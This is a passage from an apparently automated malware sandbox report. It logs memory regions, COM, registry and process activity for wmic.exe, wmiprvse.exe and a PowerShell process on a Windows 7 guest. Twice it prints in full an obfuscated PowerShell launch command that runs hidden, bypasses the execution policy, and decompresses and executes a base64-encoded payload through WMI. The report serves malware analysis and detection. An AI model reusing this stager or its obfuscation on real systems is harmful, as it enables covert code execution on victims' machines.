| wmic.exe | 0xfffa0000 | 0x10002cfff | Memory Mapped File | rwx |
|
|
|
- |
| msxml3.dll | 0x7fee52c0000 | 0x7fee5493fff | Memory Mapped File | rwx |
|
|
|
- |
| framedynos.dll | 0x7fee54c0000 | 0x7fee550bfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb680000 | 0x7fefb6a6fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fefbcd0000 | 0x7fefbd55fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefbee0000 | 0x7fefbef0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7fefbf00000 | 0x7fefbf0efff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7fefd2a0000 | 0x7fefd2fafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7fefda20000 | 0x7fefda2afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7fefee80000 | 0x7feff0d8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7feff6e0000 | 0x7feff857fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7feff870000 | 0x7feff999fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (5)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | F6D90F12-9C73-11D3-B32E-00C04F990BB4 | 2933BF95-7B36-11D2-B20E-00C04F983E60 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli\ms_409 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\YKYD69Q\ROOT\CIMV2 |
|
1 |
Registry (5)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging, data = 48 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory, data = 37 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Log File Max Size, data = 54 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | poWerSHell -NOniNtErac -noPROFIlE -NoLogO -ExECUt bYpaSS -wINDOws hidDen & ( $pSHoMe[21]+$PshoME[34]+'X')( "\"(nEw-object Io.cOMpressioN.DefLatesTReaM([sysTem.IO.MEMoRYSTREam] [COnvERT]::fRombase64sTrING('VZBba8IwGIb/SpAOEremtR5AixfaqfNGZQoblCJp+00zkqa02Wx1/vfFwy52+7zfe+ArmUApCAC0gIO9jD8h0f4oTe1NnQOyR2UJMhb1gklAjXVdapD0uWAHnu0avhWw4c38X6FjriXLMf5L1vQN4kBwyDShyxyyV2Apbuy1zsuB43DJdlB6lMtdrCqaKOl0PaftOsH05bg8rjpbRXNTSIhvQVHcO8e1hjBCXsd1fexS2iY/D6cPVQBL9tiqEM8utNvvE3Kyvr/E0MylM9ArXoEwB0/W9pYXWttmz3UfrSoa4lAyvY8Gg6lQqsD4YqRjO2ZZ2uqSZqtH7NjwK56hK0dGIOezP5+84/D+iA1Umk6yRKXmHSZttA7m80v5WheG4GutWee57U5EyC8=')"\" + ([ChAr]44).ToSTRIng() + "\"[IO.CoMpRESsiON.COmPRESsIoNModE]::dECOmPreSs ) | foREach-objECt{nEw-object SYsTEM.Io.stReAMREADeR( `$_"\" + ([ChAr]44).ToSTRIng() + "\"[systEM.tExt.eNcODiNG]::aSCiI)}| fOREacH-objECT {`$_.rEadToend() })| &( `$psHOMe[21]+`$PSHOME[30]+'x')"\" ) | - |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
1 | |
| Get Handle | c:\windows\system32\wbem\wmic.exe | base_address = 0xfffa0000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = System Time, time = 2018-11-01 09:27:45 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 138388 |
|
1 | |
| Get Time | type = Local Time, time = 2018-11-01 09:27:46 (Local Time) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Process #7: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:30, Reason: RPC Server |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:01:26 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb30 |
| Parent PID | 0x258 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B34
0x
B3C
0x
B40
0x
B44
0x
B48
0x
B4C
0x
B50
0x
B54
0x
20C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0006ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00076fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00090fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00130000 | 0x00196fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x0025ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00617fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0097ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00b0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00b10000 | 0x00ddefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x011d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x0125ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x0137ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001490000 | 0x01490000 | 0x0150ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001560000 | 0x01560000 | 0x015dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x016bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001780000 | 0x01780000 | 0x017fffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| wmiprvse.exe | 0xffaf0000 | 0xffb4efff | Memory Mapped File | rwx |
|
|
|
- |
| cimwin32.dll | 0x7fee4e10000 | 0x7fee5009fff | Memory Mapped File | rwx |
|
|
|
- |
| framedynos.dll | 0x7fee54c0000 | 0x7fee550bfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5ba0000 | 0x7fef5bb5fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5d00000 | 0x7fef5d25fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fefbcd0000 | 0x7fefbd55fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefbee0000 | 0x7fefbef0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7fefbf00000 | 0x7fefbf0efff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #8: powershell.exe
435
270
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | poWerSHell -NOniNtErac -noPROFIlE -NoLogO -ExECUt bYpaSS -wINDOws hidDen & ( $pSHoMe[21]+$PshoME[34]+'X')( "\"(nEw-object Io.cOMpressioN.DefLatesTReaM([sysTem.IO.MEMoRYSTREam] [COnvERT]::fRombase64sTrING('VZBba8IwGIb/SpAOEremtR5AixfaqfNGZQoblCJp+00zkqa02Wx1/vfFwy52+7zfe+ArmUApCAC0gIO9jD8h0f4oTe1NnQOyR2UJMhb1gklAjXVdapD0uWAHnu0avhWw4c38X6FjriXLMf5L1vQN4kBwyDShyxyyV2Apbuy1zsuB43DJdlB6lMtdrCqaKOl0PaftOsH05bg8rjpbRXNTSIhvQVHcO8e1hjBCXsd1fexS2iY/D6cPVQBL9tiqEM8utNvvE3Kyvr/E0MylM9ArXoEwB0/W9pYXWttmz3UfrSoa4lAyvY8Gg6lQqsD4YqRjO2ZZ2uqSZqtH7NjwK56hK0dGIOezP5+84/D+iA1Umk6yRKXmHSZttA7m80v5WheG4GutWee57U5EyC8=')"\" + ([ChAr]44).ToSTRIng() + "\"[IO.CoMpRESsiON.COmPRESsIoNModE]::dECOmPreSs ) | foREach-objECt{nEw-object SYsTEM.Io.stReAMREADeR( `$_"\" + ([ChAr]44).ToSTRIng() + "\"[systEM.tExt.eNcODiNG]::aSCiI)}| fOREacH-objECT {`$_.rEadToend() })| &( `$psHOMe[21]+`$PSHOME[30]+'x')"\" ) |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:14, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb5c |
| Parent PID | 0xb30 (c:\windows\system32\wbem\wmiprvse.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B60
0x
B78
0x
B80
0x
B84
0x
B90
0x
BB4
0x
BB8
0x
824
0x
878
0x
880
0x
874
0x
85C
0x
888
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00160000 | 0x00163fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x002f0000 | 0x0030ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00320000 | 0x0034ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00350000 | 0x00353fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00360fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00372fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x003b0000 | 0x003b2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d00fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01d10000 | 0x01d14fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d20000 | 0x01d20000 | 0x01d2ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x01d30000 | 0x01d70fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01d80000 | 0x01d87fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01e0ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001e10000 | 0x01e10000 | 0x01eeefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01fa0000 | 0x0226efff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02270000 | 0x022d5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x027a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| kernelbase.dll.mui | 0x027b0000 | 0x0286ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x0290ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x02910000 | 0x02963fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02cd0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02d5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002d80000 | 0x02d80000 | 0x02dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e00000 | 0x02e00000 | 0x1adfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ae00000 | 0x1ae00000 | 0x1b4cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b4f0000 | 0x1b4f0000 | 0x1b56ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b570000 | 0x1b851fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b860000 | 0x1b860000 | 0x1b95ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x756a0000 | 0x75768fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
